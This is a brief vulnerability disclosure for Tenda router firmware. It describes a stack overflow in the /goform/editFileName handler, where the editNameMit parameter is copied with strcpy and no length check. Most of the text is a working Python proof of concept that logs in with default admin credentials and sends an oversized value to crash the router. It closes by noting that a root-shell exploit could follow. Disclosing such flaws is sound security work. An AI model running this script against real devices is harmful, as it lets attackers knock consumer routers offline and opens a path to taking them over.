-
Manufacturer's address:https://www.tenda.com.cn/
-
Firmware download address : https://www.tenda.com.cn/download/detail-2218.html
In /goform/editFileName, editNameMit will be copied to s by strcpy. It is worth noting that there is no size check, which leads to a stack overflow vulnerability
import requests
cmd = b'editNameMit=' + b'a' * 0x3000
url = b"http://192.168.10.103/login/Auth"
payload = b"http://192.168.10.103/goform/editFileName/?" + cmd
data = {
"username": "admin",
"password": "admin",
}
def attack():
s = requests.session()
resp = s.post(url=url, data=data)
print(resp.content)
resp = s.post(url=payload, data=data)
print(resp.content)
attack()
You can see that the router crashed, and finally you can write an exp to get a root shell